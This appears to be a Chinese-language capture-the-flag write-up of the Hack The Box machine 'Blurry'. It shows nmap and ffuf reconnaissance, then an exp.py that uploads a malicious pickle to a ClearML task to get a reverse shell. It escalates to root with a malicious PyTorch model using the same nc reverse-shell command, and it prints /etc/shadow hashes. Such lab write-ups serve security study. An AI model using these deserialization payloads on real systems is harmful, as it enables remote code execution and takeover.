基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.11.19
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-11 13:36 CST
Nmap scan report for 10.10.11.19
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.54 seconds

80

直接访问ip是跳转到app子域名,加hosts:

1
10.10.11.19 app.blurry.htb

是ClearML:

子域名扫描

可以发现其他几个子域名,api默认选项扫描会漏掉,因为响应400:

1
2
3
4
5
6
7
8
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://app.blurry.htb/" -H 'Host: FUZZ.blurry.htb' -fs 169

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://app.blurry.htb/" -H 'Host: FUZZ.blurry.htb' -fs 169 -mc 200-299,301,302,307,400,401,403,405,500

files                   [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 96ms]
app                     [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 93ms]
chat                    [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 119ms]
api                     [Status: 400, Size: 280, Words: 4, Lines: 1, Duration: 100ms]

files

根目录只响应一个OK:

chat

是rocket chat:

随意注册登录,其中得到一些用户名:

ClearML

clearml这里只需要全名即可登录,从chat那里获取全名,进入clearml,然后创建API key测试运行:

(clearml-init验证key失败的话直接手动创建配置文件然后运行也可以)

1
~/clearml.conf

shell

clearml相关漏洞:

然后根据文章,上传恶意pickle,另外根据文章需要其他用户去get的时候才会出发,而系统上本身有一个定时运行的review会检测这个项目中review tag的Task并且去进行get,所以就是创建一个review标签的Task带恶意pickle,然后等待触发:

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient
import pickle
import os

class RunCommand:
    def __reduce__(self):
        cmd = ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 4444 >/tmp/f")
        return os.system, (cmd,)
    
pickle = RunCommand()

# task = Task.init(project_name="Miao", task_name="Miao", output_uri=True)
task = Task.init(project_name="Black Swan", tags=["review"], task_name="Miao", task_type=Task.TaskTypes.data_processing)
task.upload_artifact(name='Miao Artifact', artifact_object=pickle,wait_on_upload=True)

user flag

jippity用户桌面,另外可以获取ssh私钥方便后续操作:

提权信息

jippity可以sudo运行modules:

可以搜到:

就是自己制作一个恶意model

提权 & root flag

自己制作一个model,然后运行,得到root:

shadow

1
2
root:$y$j9T$HKjGxAyjzW3lmf/HmZafW0$fgkQykeZSlRYHzR8zHjMVQrRUzwM3xSvA0koPgt6TQ6:19770:0:99999:7:::
jippity:$y$j9T$WUn.W06MZ94pp.Zq4HANr/$UAdCX7HojvUwcmzTO6.xcwCWvxrKneaoRAPqpFf1G6D:19770:0:99999:7:::

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import torch
import torch.nn as nn
import os
class CustomModel(nn.Module):
	def __init__(self):
		super(CustomModel,self).__init__()
		self.linear = nn.Linear(10,1)
	
	def forward(self,x):
		return self.linear(x)
	
	def __reduce__(self):
		cmd = ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 4444 >/tmp/f")
		return os.system, (cmd,)
	
model = CustomModel()
torch.save(model,'miao.pth')

参考资料